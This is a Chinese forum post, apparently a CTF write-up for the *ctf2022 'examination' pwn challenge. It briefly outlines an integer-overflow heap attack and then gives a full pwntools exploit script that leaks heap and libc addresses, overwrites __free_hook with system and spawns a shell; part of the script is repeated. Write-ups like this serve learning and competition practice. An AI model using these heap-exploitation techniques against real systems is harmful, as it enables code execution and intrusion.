首页
社区
课程
招聘
[原创]【*ctf2022】examination
发表于: 2022-4-28 19:00 8652

[原创]【*ctf2022】examination

2022-4-28 19:00
8652

题目链接

何谓成长?成长就是当你还未成熟的时候脑海中复现的担当。学pwn已经半年多了,总不能还称自己是新手了吧

img

img

从之前栈题都不大会,遇到堆题基本放弃,从见了musl、go、arm就躲到现在终于主动去学习相关的知识,这就是成长。成长不仅仅意味着能力的提升,还意味着心灵的成熟,对学习的态度的变化。

最后,引用最近的脑海中一直复现的鼬神的一句话:

“你并不弱,只是缺乏信念”

img

通过整型溢出,在note段向上伪造结构体实现任意地址写,修改一个chunk的size,free它放入unsortedbin leak libc,再通过任意地址写修改free_hook为system,然后free('/bin/sh')实现shell的get

有些绕过的细节其实调调就能出

这题让我认识到了自己shit一样的逆向

逆不动的时候,可以放gdb里调调,拿张草稿纸画画或者在旁边注一下自己好理解的形式比如:

img

 
 
 
 
 
 
 
 
 
from pwn import *
from LibcSearcher import *
from pwnlib.util.iters import mbruteforce
from hashlib import sha256
import base64
context.log_level='debug'
##context.terminal = ["tmux", "splitw", "-h"]
context.arch = 'amd64'
context.os = 'linux'
def proof_of_work(sh):
    sh.recvuntil(" == ")
    cipher = sh.recvline().strip().decode("utf8")
    proof = mbruteforce(lambda x: sha256((x).encode()).hexdigest() ==  cipher, string.ascii_letters + string.digits, length=4, method='fixed')
    sh.sendlineafter("input your ????>", proof)
 
##r = remote("chuj.top", 51904)
##proof_of_work(r)
libc=ELF('./libc-2.31.so')
r=process('./examination')
 
def z():
    gdb.attach(r)
 
def cho(num):
    r.sendafter("choice>> ",str(num))
 
def t_add(num):
    cho(1)
    r.sendlineafter('enter the number of questions: ',str(num))
 
def t_view(idx,cont,size): ##first_view
    cho(3)
    r.sendlineafter("which one? > ",str(idx))
    bool_=r.recvuntil('comment:')
    if bool_ == "enter your comment:":
       r.send(cont) 
    else :
       r.sendline(str(size))
       r.sendafter("enter your comment:",cont)
 
def t_delet(idx):
    cho(4)
    r.sendafter("which student id to choose?",str(idx))
 
def t_role(num):
    cho(5)
    r.sendlineafter("role: <0.teacher/1.student>: ",str(num))
 
def s_changeid(idx):
    cho(6)
    r.sendlineafter("input your id: ",str(idx))
 
##pre
r.sendlineafter("role: <0.teacher/1.student>: ",str(0))
t_add(1) #0
t_add(1) #1
t_view(0,hex(0xdeadbeef),0x300)
t_view(1,hex(0xdeadbeef),0x300)
t_role(1)
cho(3)
t_role(0)
cho(2)
 
##leak_heap
t_role(1)
cho(2)
r.recvuntil("Good Job! Here is your reward! ")
heap=int(r.recvuntil('\n',drop=True),base=16)-0x2a0
log.success('heap:'+hex(heap))
r.sendlineafter("add 1 to wherever you want! addr: ",'00'+str(heap+0x200))
 
##make_fake_struct
s_changeid(-15)
cho(4)
pd=p64(heap+0x968)+p64(0xdeadbeef)+p64(heap+0x338)
r.sendlineafter("enter your mode!",pd)
 
##change chunck(0x55555555f330) size 311 to 621
t_role(0)
t_view(-13,p64(0x621),0x300)
 
##free_2_trew_in_unsortedbin
t_delet(0)
 
##change struct 2 leak libc
t_role(1)
s_changeid(-15)
cho(4)
pd=p64(heap+0x968)+p64(0xdeadbeef)+p64(heap+0x340)
r.sendlineafter("enter your mode!",pd)
s_changeid(-13)
cho(2)
r.recvuntil("here is the review:\n")
libcbase=u64(r.recvuntil('\x7f').ljust(8,'\x00'))-0x1ecbe0
log.success('libcbase:'+hex(libcbase))
 
##set_libc_fuc
free_hook=libcbase+libc.sym['__free_hook']
system=libcbase+libc.sym['system']
log.success('free_hook:'+hex(free_hook))
log.success('system:'+hex(system))
 
##change_free_hook
s_changeid(-15)
cho(4)
pd=p64(heap+0x968)+p64(0xdeadbeef)+p64(free_hook)
r.sendlineafter("enter your mode!",pd)
t_role(0)
t_view(-13,p64(system),0x300)
 
##get_shell
t_add(1)
t_view(1,'/bin/sh\x00',0x300)
t_delet(1)
r.interactive()
from pwn import *
from LibcSearcher import *
from pwnlib.util.iters import mbruteforce
from hashlib import sha256
import base64
context.log_level='debug'
##context.terminal = ["tmux", "splitw", "-h"]
context.arch = 'amd64'
context.os = 'linux'
def proof_of_work(sh):
    sh.recvuntil(" == ")
    cipher = sh.recvline().strip().decode("utf8")
    proof = mbruteforce(lambda x: sha256((x).encode()).hexdigest() ==  cipher, string.ascii_letters + string.digits, length=4, method='fixed')
    sh.sendlineafter("input your ????>", proof)
 
##r = remote("chuj.top", 51904)
##proof_of_work(r)
libc=ELF('./libc-2.31.so')
r=process('./examination')
 
def z():
    gdb.attach(r)
 
def cho(num):
    r.sendafter("choice>> ",str(num))
 
def t_add(num):
    cho(1)
    r.sendlineafter('enter the number of questions: ',str(num))
 
def t_view(idx,cont,size): ##first_view
    cho(3)
    r.sendlineafter("which one? > ",str(idx))
    bool_=r.recvuntil('comment:')
    if bool_ == "enter your comment:":
       r.send(cont) 
    else :
       r.sendline(str(size))
       r.sendafter("enter your comment:",cont)
 
def t_delet(idx):
    cho(4)
    r.sendafter("which student id to choose?",str(idx))
 
def t_role(num):
    cho(5)
    r.sendlineafter("role: <0.teacher/1.student>: ",str(num))

[招生]系统0day安全班,企业级设备固件漏洞挖掘,Linux平台漏洞挖掘!

收藏
免费 2
支持
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回
//